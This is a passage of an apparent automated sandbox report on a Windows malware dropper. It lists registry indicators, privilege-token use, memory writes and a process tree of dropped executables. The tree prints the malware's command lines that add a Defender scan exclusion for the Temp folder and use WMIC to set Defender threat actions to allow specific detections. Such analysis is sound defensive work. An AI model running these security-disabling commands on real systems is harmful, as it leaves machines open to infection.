sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Process not Found Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings DriverRealtekHDmaster.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3224 powershell.exe 3224 powershell.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe 1060 Sun1917b8fb5f09db8.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3232 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1300 B6srqwApy9H9mq1fCjmNFEFo.exe 7320 824.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 1312 Sun19262b9e49ad.exe Token: SeAssignPrimaryTokenPrivilege 1312 Sun19262b9e49ad.exe Token: SeLockMemoryPrivilege 1312 Sun19262b9e49ad.exe Token: SeIncreaseQuotaPrivilege 1312 Sun19262b9e49ad.exe Token: SeMachineAccountPrivilege 1312 Sun19262b9e49ad.exe Token: SeTcbPrivilege 1312 Sun19262b9e49ad.exe Token: SeSecurityPrivilege 1312 Sun19262b9e49ad.exe Token: SeTakeOwnershipPrivilege 1312 Sun19262b9e49ad.exe Token: SeLoadDriverPrivilege 1312 Sun19262b9e49ad.exe Token: SeSystemProfilePrivilege 1312 Sun19262b9e49ad.exe Token: SeSystemtimePrivilege 1312 Sun19262b9e49ad.exe Token: SeProfSingleProcessPrivilege 1312 Sun19262b9e49ad.exe Token: SeIncBasePriorityPrivilege 1312 Sun19262b9e49ad.exe Token: SeCreatePagefilePrivilege 1312 Sun19262b9e49ad.exe Token: SeCreatePermanentPrivilege 1312 Sun19262b9e49ad.exe Token: SeBackupPrivilege 1312 Sun19262b9e49ad.exe Token: SeRestorePrivilege 1312 Sun19262b9e49ad.exe Token: SeShutdownPrivilege 1312 Sun19262b9e49ad.exe Token: SeDebugPrivilege 1312 Sun19262b9e49ad.exe Token: SeAuditPrivilege 1312 Sun19262b9e49ad.exe Token: SeSystemEnvironmentPrivilege 1312 Sun19262b9e49ad.exe Token: SeChangeNotifyPrivilege 1312 Sun19262b9e49ad.exe Token: SeRemoteShutdownPrivilege 1312 Sun19262b9e49ad.exe Token: SeUndockPrivilege 1312 Sun19262b9e49ad.exe Token: SeSyncAgentPrivilege 1312 Sun19262b9e49ad.exe Token: SeEnableDelegationPrivilege 1312 Sun19262b9e49ad.exe Token: SeManageVolumePrivilege 1312 Sun19262b9e49ad.exe Token: SeImpersonatePrivilege 1312 Sun19262b9e49ad.exe Token: SeCreateGlobalPrivilege 1312 Sun19262b9e49ad.exe Token: 31 1312 Sun19262b9e49ad.exe Token: 32 1312 Sun19262b9e49ad.exe Token: 33 1312 Sun19262b9e49ad.exe Token: 34 1312 Sun19262b9e49ad.exe Token: 35 1312 Sun19262b9e49ad.exe Token: SeDebugPrivilege 3528 Sun191101c1aaa.exe Token: SeDebugPrivilege 4596 Sun19e4ade31b2a.exe Token: SeDebugPrivilege 3224 powershell.exe Token: SeDebugPrivilege 2176 Sun195a1614ec24e6a.exe Token: SeDebugPrivilege 4712 Sun198361825f4.exe Token: SeRestorePrivilege 6048 WerFault.exe Token: SeBackupPrivilege 6048 WerFault.exe Token: SeBackupPrivilege 6048 WerFault.exe Token: SeDebugPrivilege 5852 4957782.scr Token: SeDebugPrivilege 5656 2.exe Token: SeDebugPrivilege 5532 Conhost.exe Token: SeDebugPrivilege 6784 5.exe Token: SeDebugPrivilege 6728 Install.exe Token: SeDebugPrivilege 852 f.exe Token: SeDebugPrivilege 7020 LivelyScreenRecF18.exe Token: SeDebugPrivilege 1852 5FBE.exe Token: SeDebugPrivilege 3176 BearVpn 3.exe Token: SeShutdownPrivilege 3232 Process not Found Token: SeCreatePagefilePrivilege 3232 Process not Found Token: SeDebugPrivilege 5600 Ze2ro.exe Token: SeShutdownPrivilege 3232 Process not Found Token: SeCreatePagefilePrivilege 3232 Process not Found Token: SeShutdownPrivilege 3232 Process not Found Token: SeCreatePagefilePrivilege 3232 Process not Found Token: SeDebugPrivilege 6704 3972948.exe Token: SeShutdownPrivilege 3232 Process not Found Token: SeCreatePagefilePrivilege 3232 Process not Found Token: SeDebugPrivilege 2828 Chrome 5.exe Token: SeShutdownPrivilege 3232 Process not Found Token: SeCreatePagefilePrivilege 3232 Process not Found -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 5628 Conhost.exe 6732 ultramediaburner.tmp 5204 installer.exe 7732 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3636 wrote to memory of 4996 3636 setup_x86_x64_install.exe 78 PID 3636 wrote to memory of 4996 3636 setup_x86_x64_install.exe 78 PID 3636 wrote to memory of 4996 3636 setup_x86_x64_install.exe 78 PID 4996 wrote to memory of 4992 4996 setup_installer.exe 79 PID 4996 wrote to memory of 4992 4996 setup_installer.exe 79 PID 4996 wrote to memory of 4992 4996 setup_installer.exe 79 PID 4992 wrote to memory of 4416 4992 setup_install.exe 83 PID 4992 wrote to memory of 4416 4992 setup_install.exe 83 PID 4992 wrote to memory of 4416 4992 setup_install.exe 83 PID 4992 wrote to memory of 4432 4992 setup_install.exe 84 PID 4992 wrote to memory of 4432 4992 setup_install.exe 84 PID 4992 wrote to memory of 4432 4992 setup_install.exe 84 PID 4992 wrote to memory of 4292 4992 setup_install.exe 85 PID 4992 wrote to memory of 4292 4992 setup_install.exe 85 PID 4992 wrote to memory of 4292 4992 setup_install.exe 85 PID 4992 wrote to memory of 5084 4992 setup_install.exe 108 PID 4992 wrote to memory of 5084 4992 setup_install.exe 108 PID 4992 wrote to memory of 5084 4992 setup_install.exe 108 PID 4992 wrote to memory of 4168 4992 setup_install.exe 86 PID 4992 wrote to memory of 4168 4992 setup_install.exe 86 PID 4992 wrote to memory of 4168 4992 setup_install.exe 86 PID 4992 wrote to memory of 1900 4992 setup_install.exe 87 PID 4992 wrote to memory of 1900 4992 setup_install.exe 87 PID 4992 wrote to memory of 1900 4992 setup_install.exe 87 PID 4992 wrote to memory of 5060 4992 setup_install.exe 96 PID 4992 wrote to memory of 5060 4992 setup_install.exe 96 PID 4992 wrote to memory of 5060 4992 setup_install.exe 96 PID 4992 wrote to memory of 4716 4992 setup_install.exe 88 PID 4992 wrote to memory of 4716 4992 setup_install.exe 88 PID 4992 wrote to memory of 4716 4992 setup_install.exe 88 PID 4992 wrote to memory of 4700 4992 setup_install.exe 95 PID 4992 wrote to memory of 4700 4992 setup_install.exe 95 PID 4992 wrote to memory of 4700 4992 setup_install.exe 95 PID 4992 wrote to memory of 904 4992 setup_install.exe 94 PID 4992 wrote to memory of 904 4992 setup_install.exe 94 PID 4992 wrote to memory of 904 4992 setup_install.exe 94 PID 4432 wrote to memory of 1060 4432 cmd.exe 93 PID 4432 wrote to memory of 1060 4432 cmd.exe 93 PID 4432 wrote to memory of 1060 4432 cmd.exe 93 PID 4292 wrote to memory of 1312 4292 cmd.exe 89 PID 4292 wrote to memory of 1312 4292 cmd.exe 89 PID 4292 wrote to memory of 1312 4292 cmd.exe 89 PID 4416 wrote to memory of 3224 4416 cmd.exe 92 PID 4416 wrote to memory of 3224 4416 cmd.exe 92 PID 4416 wrote to memory of 3224 4416 cmd.exe 92 PID 4992 wrote to memory of 1300 4992 setup_install.exe 91 PID 4992 wrote to memory of 1300 4992 setup_install.exe 91 PID 4992 wrote to memory of 1300 4992 setup_install.exe 91 PID 4992 wrote to memory of 4112 4992 setup_install.exe 90 PID 4992 wrote to memory of 4112 4992 setup_install.exe 90 PID 4992 wrote to memory of 4112 4992 setup_install.exe 90 PID 4992 wrote to memory of 3068 4992 setup_install.exe 107 PID 4992 wrote to memory of 3068 4992 setup_install.exe 107 PID 4992 wrote to memory of 3068 4992 setup_install.exe 107 PID 4168 wrote to memory of 4596 4168 cmd.exe 97 PID 4168 wrote to memory of 4596 4168 cmd.exe 97 PID 1900 wrote to memory of 4660 1900 cmd.exe 106 PID 1900 wrote to memory of 4660 1900 cmd.exe 106 PID 1900 wrote to memory of 4660 1900 cmd.exe 106 PID 5084 wrote to memory of 4280 5084 cmd.exe 98 PID 5084 wrote to memory of 4280 5084 cmd.exe 98 PID 5060 wrote to memory of 4748 5060 cmd.exe 104 PID 5060 wrote to memory of 4748 5060 cmd.exe 104 PID 5060 wrote to memory of 4748 5060 cmd.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1060 -
C:\Users\Admin\Documents\xp8HI_bx8rPBYFlZRfG1vMN3.exe"C:\Users\Admin\Documents\xp8HI_bx8rPBYFlZRfG1vMN3.exe"6⤵
- Executes dropped EXE
PID:5808
-
-
C:\Users\Admin\Documents\B6srqwApy9H9mq1fCjmNFEFo.exe"C:\Users\Admin\Documents\B6srqwApy9H9mq1fCjmNFEFo.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6160 -
C:\Users\Admin\Documents\B6srqwApy9H9mq1fCjmNFEFo.exe"C:\Users\Admin\Documents\B6srqwApy9H9mq1fCjmNFEFo.exe"7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1300
-
-
-
C:\Users\Admin\Documents\hnLz9ujGWUUQxBJp7pt3qDvv.exe"C:\Users\Admin\Documents\hnLz9ujGWUUQxBJp7pt3qDvv.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6152
-
-
C:\Users\Admin\Documents\2lzrdpLz3EwEV8Dc9XpMntEo.exe"C:\Users\Admin\Documents\2lzrdpLz3EwEV8Dc9XpMntEo.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5240
-
-
C:\Users\Admin\Documents\RGqHgGnaMbL0px6v6Tzt7OjM.exe"C:\Users\Admin\Documents\RGqHgGnaMbL0px6v6Tzt7OjM.exe"6⤵PID:3220
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵PID:6132
-
C:\Users\Admin\Documents\n42jvMA2SmHdRuAJFM9TIANN.exe"C:\Users\Admin\Documents\n42jvMA2SmHdRuAJFM9TIANN.exe"8⤵PID:4600
-
-
C:\Users\Admin\Documents\exynGfl6IadH4xrIeBoAevBG.exe"C:\Users\Admin\Documents\exynGfl6IadH4xrIeBoAevBG.exe"8⤵PID:6080
-
C:\Users\Admin\AppData\Local\Temp\7zSD56B.tmp\Install.exe.\Install.exe9⤵PID:964
-
C:\Users\Admin\AppData\Local\Temp\7zSDA3E.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:6728 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵PID:1588
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:5368
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:7076
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:1264
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:7696
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:3352
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:7968
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:6928
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:7144
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:1692
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:7728
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:1188
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:5992
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:6604
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:3904
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:5672
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6556
-
-
-
-
-
-
